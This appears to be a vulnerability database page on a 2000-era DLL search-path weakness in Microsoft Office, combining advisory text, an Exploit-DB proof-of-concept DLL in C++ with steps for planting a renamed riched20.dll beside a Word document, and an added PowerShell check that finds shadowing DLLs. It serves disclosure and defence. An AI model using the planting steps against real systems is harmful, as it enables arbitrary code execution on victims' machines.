Published: 2000-11-14 00:00:00
Revised: 2017-10-09 21:29:20

[Original] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document.

[CNNVD] Microsoft Office Command Execution Vulnerability (CNNVD-200011-047)

        When a Microsoft Office 2000 document is launched, its directory is searched first for DLLs such as riched20.dll and msi.dll; an attacker can execute arbitrary commands by placing a Trojan horse DLL in the same directory as the document.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)


- OVAL (technical details used for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20000922 Eudora + riched20.dll affects WinZip v8.0 as well
(UNKNOWN)  NTBUGTRAQ  20000921 Mitigators for possible exploit of Eudora via Guninski #21,2000
(VENDOR_ADVISORY)  WIN2KSEC  20000918 Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases
(UNKNOWN)  XF  office-dll-execution(5263)

- Vulnerability information

Microsoft Office Command Execution Vulnerability
Critical Unknown
2000-11-14 00:00:00 2005-05-02 00:00:00

- Advisories and patches


- Vulnerability information (20232)

MS Windows 2000/NT 4 DLL Search Path Weakness (EDBID:20232)
windows local
2000-09-18 Verified
0 Georgi Guninski
N/A

When a program executes under Microsoft Windows, it may require additional code stored in DLL library files. These files are dynamically located at run time, and loaded if necessary. A weakness exists in the algorithm used to locate these files.

The search algorithm used to locate DLL files specifies that the current working directory is checked before the System folders. If a trojaned DLL can be inserted into the system in an arbitrary location, and a predictable executable called with the same current working directory, the trojaned DLL may be loaded and executed. This may occur when a data file is accessed through the 'Run' function, or double clicked in Windows Explorer.

This has been reported to occur with the 'riched20.dll' and 'msi.dll' DLL files and some Microsoft Office applications, including WordPad.

This behavior has also been reported for files loaded from UNC shares, or directly from FTP servers. 

// dll1.cpp : Defines the entry point for the DLL application.

#include <windows.h>   // MessageBox and the DllMain reason codes (the original project pulled this in via "stdafx.h")
#include <stdlib.h>

// Proof-of-concept DllMain: when an Office application loads this file in place
// of the real riched20.dll, the DLL_PROCESS_ATTACH case runs inside that process.
BOOL APIENTRY DllMain(HANDLE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            // Initialize once for each new process.
            // Return FALSE to fail DLL load.
            MessageBox(NULL, "Hello world!", "Info", MB_OK);
            MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to create it.", "Info", MB_OK);
            // (The statement that actually started C:\TEST.EXE is not reproduced on this page.)
            break;

        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            // MessageBox(NULL, "DllMain.dll: DLL_THREAD_ATTACH", "Info", MB_OK);
            break;

        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }
    return TRUE;
}

1) Rename dll1.dll to riched20.dll
2) Place riched20.dll in a directory of your choice
3) Close all Office applications
4) From Windows Explorer, double click on an Office document (preferably an MS Word document) in the directory containing riched20.dll
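As an added defender's check (not part of the original advisory or of the exploit entry above), the following PowerShell function lists DLLs found in a document folder whose file names shadow a DLL in System32, the condition the weakness described above depends on, and reports whether each one is a byte-identical copy of the system file and whether it carries a valid Authenticode signature. The function name, the default paths and the sample scan of the Documents folder are my choices.

```powershell
# Added example: find DLLs that would be picked up ahead of the copy in System32
# when a document in $Path is opened. Runs on Windows PowerShell 5.1 or PowerShell 7.
function Find-ShadowingDlls {
    param(
        [Parameter(Mandatory)] [string] $Path,                  # folder that holds the documents
        [string] $SystemDir = "$env:SystemRoot\System32"        # legitimate home of riched20.dll, msi.dll, ...
    )

    # Lookup of lower-cased DLL names that legitimately live in the system directory.
    $systemDlls = @{}
    Get-ChildItem -Path $SystemDir -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        ForEach-Object { $systemDlls[$_.Name.ToLowerInvariant()] = $_.FullName }

    Get-ChildItem -Path $Path -Filter '*.dll' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $name = $_.Name.ToLowerInvariant()
            if (-not $systemDlls.ContainsKey($name)) { return }   # no system DLL of that name: skip

            $sysPath   = $systemDlls[$name]
            $localHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            $sysHash   = (Get-FileHash -Path $sysPath    -Algorithm SHA256).Hash
            $sig       = Get-AuthenticodeSignature -FilePath $_.FullName

            [pscustomobject]@{
                Dll           = $_.FullName
                ShadowsSystem = $sysPath
                SameAsSystem  = ($localHash -eq $sysHash)   # $true: a plain copy; $false: different code
                Signature     = $sig.Status                 # 'Valid' for a vendor-signed file, 'NotSigned' otherwise
                Signer        = $sig.SignerCertificate.Subject
            }
        }
}

# Sample use: scan the current user's Documents tree and show unsigned hits first.
Find-ShadowingDlls -Path "$env:USERPROFILE\Documents" |
    Sort-Object Signature |
    Format-Table -AutoSize
```

A DLL that shadows a system name, differs from the System32 copy and is unsigned is the pattern to investigate; a signed, byte-identical copy is usually an application that ships its own redistributable.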

- Vulnerability information

Microsoft Windows / Office DLL Search Path Weakness
Context Dependent | Input Manipulation
Loss of Integrity | Solution Unknown
Exploit Public | Uncoordinated Disclosure

- Vulnerability description

- Timeline

2000-09-18 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete